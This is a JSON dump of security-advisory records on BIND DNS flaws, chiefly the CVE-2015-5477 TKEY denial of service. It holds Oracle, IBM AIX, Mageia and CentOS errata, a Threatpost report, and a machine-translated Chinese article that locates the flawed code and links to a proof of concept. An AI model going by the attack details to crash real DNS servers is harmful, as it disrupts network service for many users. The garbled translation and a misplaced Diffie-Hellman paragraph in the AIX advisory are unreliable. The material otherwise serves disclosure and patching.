#8063)\n* Mon Jan 17 2000 Bernhard Rosenkraenzer \n- Fix up location of named-bootconf.pl and make it executable\n (Bug #8028)\n- bind-devel requires bind\n* Mon Nov 15 1999 Bernhard Rosenkraenzer \n- update to 8.2.2-P5\n* Wed Nov 10 1999 Bill Nottingham \n- update to 8.2.2-P3\n* Tue Oct 12 1999 Cristian Gafton \n- add patch to stop a cache only server from complaining about lame servers\n on every request.\n* Fri Sep 24 1999 Preston Brown \n- use real stop and start in named.init for restart, not ndc restart, it has\n problems when named has changed during a package update... (# 4890)\n* Fri Sep 10 1999 Bill Nottingham \n- chkconfig --del in %preun, not %postun\n* Mon Aug 16 1999 Bill Nottingham \n- initscript munging\n* Mon Jul 26 1999 Bill Nottingham \n- fix installed chkconfig links to match init file\n* Sat Jul 03 1999 Jeff Johnson \n- conflict with new (in man-1.24) man pages (#3876,#3877).\n* Tue Jun 29 1999 Bill Nottingham \n- fix named.logrotate (wrong %SOURCE)\n* Fri Jun 25 1999 Jeff Johnson \n- update to 8.2.1.\n- add named.logrotate (#3571).\n- hack around egcs-1.1.2 -m486 bug (#3413, #3485).\n- vet file list.\n* Fri Jun 18 1999 Bill Nottingham \n- don't run by default\n* Sun May 30 1999 Jeff Johnson \n- nslookup fixes (#2463).\n- missing files (#3152).\n* Sat May 01 1999 Stepan Kasal \n- nslookup patched:\n to count numRecords properly\n to fix subsequent calls to ls -d\n to parse 'view' and 'finger' commands properly\n the view hack updated for bind-8 (using sed)\n* Wed Mar 31 1999 Bill Nottingham \n- add ISC patch\n- add quick hack to make host not crash\n- add more docs\n* Fri Mar 26 1999 Cristian Gafton \n- add probing information in the init file to keep linuxconf happy\n- dont strip libbind\n* Sun Mar 21 1999 Cristian Gafton \n- auto rebuild in the new build environment (release 3)\n* Wed Mar 17 1999 Preston Brown \n- removed 'done' output at named shutdown.\n* Tue Mar 16 1999 Cristian Gafton \n- version 8.2\n* Wed Dec 30 1998 Cristian Gafton \n- patch to use the __FDS_BITS macro\n- build for glibc 2.1\n* Wed Sep 23 1998 Jeff Johnson \n- change named.restart to /usr/sbin/ndc restart\n* Sat Sep 19 1998 Jeff Johnson \n- install man pages correctly.\n- change K10named to K45named.\n* Wed Aug 12 1998 Jeff Johnson \n- don't start if /etc/named.conf doesn't exist.\n* Sat Aug 08 1998 Jeff Johnson \n- autmagically create /etc/named.conf from /etc/named.boot in %post\n- remove echo in %post\n* Wed Jun 10 1998 Jeff Johnson \n- merge in 5.1 mods\n* Sun Apr 12 1998 Manuel J. Galan \n- Several essential modifications to build and install correctly.\n- Modified 'ndc' to avoid deprecated use of '-'\n* Mon Dec 22 1997 Scott Lampert \n- Used buildroot\n- patched bin/named/ns_udp.c to use \n for include\n on Redhat 5.0 instead of ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2022-02-03T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4095", "CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447", "CVE-2009-0025", "CVE-2009-0696", "CVE-2010-0097", "CVE-2010-0290", "CVE-2011-0414", "CVE-2011-1910", "CVE-2011-2464", "CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2012-5688", "CVE-2012-5689", "CVE-2013-2266", "CVE-2013-4854", "CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848", "CVE-2016-8864", "CVE-2016-9147", "CVE-2017-3136", "CVE-2017-3137", "CVE-2017-3142", "CVE-2017-3143", "CVE-2017-3145", "CVE-2018-5740", "CVE-2018-5741", "CVE-2018-5743", "CVE-2020-8616", "CVE-2020-8617", "CVE-2020-8622", "CVE-2020-8625", "CVE-2021-25215"], "modified": "2022-02-03T00:00:00", "id": "ELSA-2022-9117", "href": "http://linux.oracle.com/errata/ELSA-2022-9117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "aix": [{"lastseen": "2022-01-29T00:44:57", "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Thu Aug 13 10:35:36 CDT 2015\n|Updated: Mon Aug 17 09:11:49 CDT 2015\n|Update: Added AIX 5.3 vulnerability information\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\n\n\nSecurity Bulletin: Vulnerability in BIND affects AIX (CVE-2015-5477)\n\n\n===============================================================================\n\nSUMMARY:\n\n BIND vulnerability disclosed by Internet Systems Consortium (ISC) affects\n AIX. AIX has addressed this CVE.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2015-5477\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n error in the handling of TKEY queries. By sending specially-crafted\n packets, a remote attacker could exploit this vulnerability to cause a\n REQUIRE assertion failure.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n \ufffdhttps://exchange.xforce.ibmcloud.com/vulnerabilities/105120\ufffdfor the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n| AIX 5.3, 6.1, 7.1\n VIOS 2.2.x\n\n The following AIX fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n| bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs \n bos.net.tcp.client 6.1.0.0 6.1.8.19 key_w_fs\n bos.net.tcp.client 6.1.0.0 6.1.9.45 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.2.19 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.3.45 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ------------------------------------------------------------\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.8.19(2.2.2.6)\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.9.45(2.2.3.50)\n\n\n Note: to find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ---------------------------------------------------\n 6.1.9 IV75692 12/04/15 SP6 key_w_apar\n 7.1.3 IV75693 2/26/16 SP6 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV75692\n http://www.ibm.com/support/docview.wss?uid=isg1IV75693\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or http\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ------------------------------------------------\n| 5.3.12.9 IV75966s9a.150813.epkg.Z key_w_fix\n 6.1.8.6 IV75694s6a.150803.epkg.Z key_w_fix\n 6.1.9.5 IV75692s5a.150803.epkg.Z key_w_fix\n 7.1.2.6 IV75690s6a.150803.epkg.Z key_w_fix\n 7.1.3.5 IV75693s5a.150803.epkg.Z key_w_fix\n\n\n To extract the fixes from the tar file:\n\n tar xvf bind9_fix8.tar\n cd bind9_fix8\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n| 043af7d6494326d47b3d35a2a1b9785ea7df4b6d6e56282a251d52d5579d67a1 IV75966s9a.150813.epkg.Z key_w_csum\n af10c7895263c219514f1281617c082dbef35ec5076fa6744e3726517eb322dc IV75694s6a.150803.epkg.Z key_w_csum\n c8c76aed365993102386e9a01b825673fe5684e0b549ae72abf6f1fb9cd55fba IV75692s5a.150803.epkg.Z key_w_csum\n e574f9da379cb8eb8709cd7f87243cb44b75cc8462a02144973d4def4b7021c4 IV75690s6a.150803.epkg.Z key_w_csum\n ad3665e58be16caf9b21f75f788431181c3d79b057129bf4da05690c0bed9304 IV75693s5a.150803.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n You should verify applying this configuration change does not cause\n any compatibility issues. If you change the default setting after\n applying the fix, you will expose yourself to the attack described\n above. IBM recommends that you review your entire environment to\n identify other areas where you have enabled the Diffie-Hellman\n key-exchange protocol used in TLS and take appropriate mitigation and\n remediation actions.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2:\n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n\nACKNOWLEDGEMENTS:\n\n None\n\n\nCHANGE HISTORY:\n\n First Issued: Thu Aug 13 10:35:36 CDT 2015\n| Updated: Mon Aug 17 09:11:49 CDT 2015\n| Update: Added AIX 5.3 vulnerability information\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. \n", "cvss3": {}, "published": "2015-08-13T10:35:36", "type": "aix", "title": "Vulnerability in BIND affects AIX,Vulnerability in BIND affects VIOS", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-17T09:11:49", "id": "BIND9_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "myhack58": [{"lastseen": "2016-11-12T17:51:48", "edition": 2, "description": "2 0 1 5 year 7 on 2 8 August, the world's most widely used DNS server bind9 broke a serious denial of service vulnerability, CVE-2 0 1 5-5 4 7 7 to.\n\nA little background: DNS is the domain name mapped to the IP address of the service. When you visit google.com when, the computer will ask you where the cell of the DNS server, google.com the IP address is? If your neighbor also happens in access google.com the DNS server will return directly to its IP; otherwise, the DNS server will go ask Google official DNS server, to give google.com the IP address and return to you. This cell of the DNS server is called a recursive DNS; recursive DNS hung up, will cause it to service the region cannot access to the Internet. Google's official DNS server is called authoritative DNS; the authoritative DNS hung up, cause it to the service site from the face of the earth.\n\n! [](/Article/UploadPic/2015-8/201582165044529.jpg)\n\nDNS recursive queries [image source](<http://www.technicalinfo.net/papers/Pharming.html> the)\n\nThis vulnerability is serious and to what extent? Just send a UDP packet, you can get a hanging one DNS server. Whether it is a recursive DNS or authoritative DNS, regardless of bind9 to do what configuration, as long as this data package is bind9 process of receiving, it will immediately throw an exception and terminate the service.\n\nLUG DNS maintainer Roy Zhang from the Debian Security Notice that this vulnerability and quickly hit on a patch. I write a POC to test out some DNS server, the school DNS to engage in hang up, and report the network center james greatly subsequently received thanks to the testing of most of the operators of the DNS and the smaller some public DNS is also affected by the vulnerability. Now from vulnerability disclosure has been over 7 2 hours, but this serious vulnerability has not yet received enough attention. In the [POC](<https://gist.github.com/bojieli/6d4c370643c6b9f64227>) (Proof of Concept exploit code) to put out, but also to share with you to write the POC process.\n\n### Vulnerability where\n\nTo be timely informed of the vulnerability information, it is recommended to subscribe you care about the release of the Security Tracker. For example Debian on the vulnerability of the [Bulletin](<https://security-tracker.debian.org/tracker/CVE-2015-5477>), from the Source column can be linked to the vulnerability source is CVE, and the other release of the security Bulletin. Description is like this:\n\n\nnamed in ISC BIND 9. x before 9.9.7-P2 and 9.10. x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.\n\nTo further understand this vulnerability the best way is to source code. To fix this vulnerability, bind9 code to do what modifications, bug out somewhere. Ask Google to find the bind9 source tree [Gitweb](<https://source.isc.org/cgi-bin/gitweb.cgi?p=bind9.git;a=summary>), and in the commit log to find this line\n\n\n2015-07-14 Mark Andrews add CVE-2 0 1 5-5 4 7 7\n\nThis is just an illustration, real code changes in it before. We can look through the commit log to find the real code modify.\n\n! [](/Article/UploadPic/2015-8/2 0 1 5 8 2 1 6 5 0 4 4 2 8 6. png)\n\nThe attentive reader may have found, the commit time is 2 0 1 5 year 7 month 1 4 day, which is half a month ago! Yes, vulnerability fix and disclosure process is like that.\n\n1. A vulnerability report, and this was the only vulnerability reported by people and bind9 security team know.\n2. bind9 vulnerability fix.\n3. Notice to some of the \u201cimportant vendors\u201d, including major releases, partnerships with large companies to.\n4. In the negotiated time of public release.\n\nIf you stare at some of the open source software of the warehouse to see, will find some security vulnerabilities were fixed, but the network on almost search anything. A few days later, the CVE database can be checked, each of the transmission line version of the published security advisories, hacker news and the like of the media also began coverage. That is, when we from the \u201cofficial channels\u201d that a vulnerability when it is not 0day, 1day are not.\n\n### Disaster from the ASSERTION\n\nGet down to business. This vulnerability fix is very simple, just add the name = NULL; this word. The problem description said that the illegal packets will cause the assertion fail and quit.\n\nDNS query is a UDP packet, ask a question; the DNS server will respond to a UDP packet, to tell the query answer. DNS query and response packet format is the same, by the question, answer, authority, information, additional information, etc. parts.\n\n! [](/Article/UploadPic/2015-8/201582165044643.jpg)\n\nDNS request format images source\n\nThe problematic code block is this in dns_tkey_processquery function:\n\n! [](/Article/UploadPic/2015-8/2 0 1 5 8 2 1 6 5 0 4 6 9 1 7. png)\n\nThe calling procedure is like this:\n\n1. From the DNS request QUESTION block is found to be a query name stored in the qname is. For example, we query google.com that QUESTION block there is a problem, and its name is google.com the.\n2. From the DNS request the ADDITIONAL blocks found with the query name qname\uff09match the name stored in the name. For legitimate TKEY request, this one place should be a transaction key This is not important, interested students can go to see [the RFC 2 9 3 0](<https://tools.ietf.org/html/rfc2930>). the\n3. If the ADDITIONAL block is not found, then try to go from the ANSWER block. \uff08NIMA Win2000 developer brain pumping?, obviously this is a problem, but put TKEY into the answer block, this is it.\uff09\n\n**[1] [[2]](<65275_2.htm>) [next](<65275_2.htm>)**\n", "cvss3": {}, "published": "2015-08-02T00:00:00", "type": "myhack58", "title": "A data packet to eliminate a single server of the DNS vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-02T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2015/65275.htm", "id": "MYHACK58:62201565275", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:29", "description": "The maintainers of BIND have patched a critical remotely exploitable vulnerability in the DNS software that can be used in a denial-of-service attack. The vulnerability affects all versions of BIND from 9.1.0 through 9.9.7.\n\nThe vulnerability is in the way that BIND handles certain queries related to transaction key records. The bug is fixed in BIND versions 9.9.7-P2 and P3.\n\n\u201cAn error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit,\u201d the [advisory](<https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/>) from the Internet Systems Consortium, which maintains BIND, says.\n\n\u201cBoth recursive and authoritative servers are vulnerable to this defect. Additionally, exposure is not prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling, before checks enforcing those boundaries.\u201d\n\nBIND is the most widely deployed name server software on the Internet and The TKEY flaw is an especially problematic one for administrators running name servers, as the ISC says there is no real workaround and defending against the bug can be quite difficult.\n\n\u201cMany of our bugs are limited in scope or affect only users having a particular set of configuration choices. CVE-2015-5477 does not fall into that category. Almost all unpatched BIND servers are potentially vulnerable. We know of no configuration workarounds. Screening the offending packets with firewalls is likely to be difficult or impossible unless those devices understand DNS at a protocol level and may be problematic even then. And the fix for this defect is very localized to one specific area of the BIND code,\u201d Michael McNally said in a special [note](<https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/>) on the vulnerability.\n\nMcNally added that there\u2019s a good possibility that practical attacks against CVE-2015-5477 will emerge in short order.\n\n\u201cThe practical effect of this is that this bug is difficult to defend against (except by patching, which is completely effective) and will not be particularly difficult to reverse-engineer. I have already been told by one expert that they have successfully reverse-engineered an attack kit from what has been divulged and from analyzing the code changes, and while I have complete confidence that the individual who told me this is not intending to use his kit in a malicious manner, there are others who will do so who may not be far behind,\u201d McNally said.\n\nThe ISC has released the two new versions to fix the TKEY vulnerability. There is also a second security fix in the new versions, though it\u2019s less serious than the TKEY bug.\n\n\u201cOn servers configured to perform DNSSEC validation, an assertion failure could be triggered on answers from a specially configured server,\u201d the [BIND release notes](<https://kb.isc.org/article/AA-01279>) say.\n", "cvss3": {}, "published": "2015-07-29T09:09:28", "type": "threatpost", "title": "Critical Remotely Exploitable Bug Haunts BIND", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-04T15:54:09", "id": "THREATPOST:345F6C411E78E96A9B0A921D21729C65", "href": "https://threatpost.com/critical-remotely-exploitable-bug-haunts-bind/114008/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit (CVE-2015-5477). \n", "cvss3": {}, "published": "2015-07-31T22:46:26", "type": "mageia", "title": "Updated bind package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-31T22:46:26", "id": "MGASA-2015-0298", "href": "https://advisories.mageia.org/MGASA-2015-0298.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2022-02-27T11:53:12", "description": "**CentOS Errata and Security Advisory** CESA-2015:1514\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-July/058189.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1514", "cvss3": {}, "published": "2015-07-29T02:04:03", "type": "centos", "title": "bind, caching security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T02:04:03", "id": "CESA-2015:1514", "href": "https://lists.centos.org/pipermail/centos-announce/2015-July/058189.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-27T11:53:12", "description": "**CentOS Errata and Security Advisory** CESA-2015:1513\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-July/058187.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2015-July/014995.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libs\nbind-libs-lite\nbind-license\nbind-lite-devel\nbind-sdb\nbind-sdb-chroot\nbind-utils\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1513", "cvss3": {}, "published": "2015-07-29T01:43:33", "type": "centos", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T01:56:37", "id": "CESA-2015:1513", "href": "https://lists.centos.org/pipermail/centos-announce/2015-July/058187.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-27T11:53:12", "description": "**CentOS Errata and Security Advisory** CESA-2015:1515\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-July/058188.html\n\n**Affected packages:**\nbind97\nbind97-chroot\nbind97-devel\nbind97-libs\nbind97-utils\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1515", "cvss3": {}, "published": "2015-07-29T02:03:50", "type": "centos", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T02:03:50", "id": "CESA-2015:1515", "href": 